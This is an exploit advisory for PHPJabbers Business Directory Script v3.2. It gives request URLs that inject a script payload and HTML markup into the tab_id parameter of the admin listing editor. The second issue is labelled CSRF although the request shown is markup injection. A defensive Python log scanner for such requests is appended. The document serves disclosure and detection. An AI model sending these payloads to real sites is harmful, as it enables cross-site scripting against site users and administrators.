# Exploit Title: PHPJabbers Business Directory Script v3.2 - Multiple Vulnerabilities
# Date: 09/08/2023
# Exploit Author: Kerimcan Ozturk
# Vendor Homepage: https://www.phpjabbers.com/
# Software Link: https://www.phpjabbers.com/business-directory-script/
# Version: 3.2
# Tested on: Windows 10 Pro

## Description

Technical Detail / POC
==========================
Login Account
Go to Property Page ( https://website/index.php?controller=pjAdminListings&action=pjActionUpdate)
Edit Any Property ( https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57 )

[1] Cross-Site Scripting (XSS)

Request: https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id= "<script><image/src/onerror=prompt(8)>

[2] Cross-Site Request Forgery

Request: https://website/index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id= "<script><font%20color="green">Kerimcan%20Ozturk</font>

Best Regards
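Added example (not part of the original advisory and not vendor code): a log check a defender can run to find requests to the listing-update endpoint above whose tab_id parameter carries anything other than a plain token, including double-encoded values. The access-log format, the sample lines and the rule that a legitimate tab_id is a short alphanumeric token are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Assumption: a legitimate tab_id is a short identifier-like token.
SAFE_TAB_ID = re.compile(r"[A-Za-z0-9_-]{0,32}")
# Request part of a common/combined access-log line (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; the markup in them is a harmless <b> tag.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Aug/2023:10:00:01 +0000] "GET /index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=tabs-1 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Aug/2023:10:00:07 +0000] "GET /index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&locale=1&tab_id=%22%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5187',
    '203.0.113.9 - - [09/Aug/2023:10:00:09 +0000] "GET /index.php?controller=pjAdminListings&action=pjActionUpdate&id=57&tab_id=%2522%253Cb%253E HTTP/1.1" 200 5187',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_tab_id(url):
    """Decoded tab_id if the URL targets the listing editor with a non-token tab_id."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if params.get("controller") != ["pjAdminListings"]:
        return None
    if params.get("action") != ["pjActionUpdate"]:
        return None
    for raw in params.get("tab_id", []):  # parse_qs has already decoded once
        value = fully_decode(raw)
        if not SAFE_TAB_ID.fullmatch(value):
            return value
    return None

def scan(lines):
    """Return (client_ip, decoded tab_id) for every flagged request line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            value = suspicious_tab_id(match.group(1))
            if value is not None:
                hits.append((line.split()[0], value))
    return hits
```

Hits from scan() point at requests worth reviewing; the fix itself belongs server-side, where tab_id should be validated and HTML-encoded before it is written back into the page.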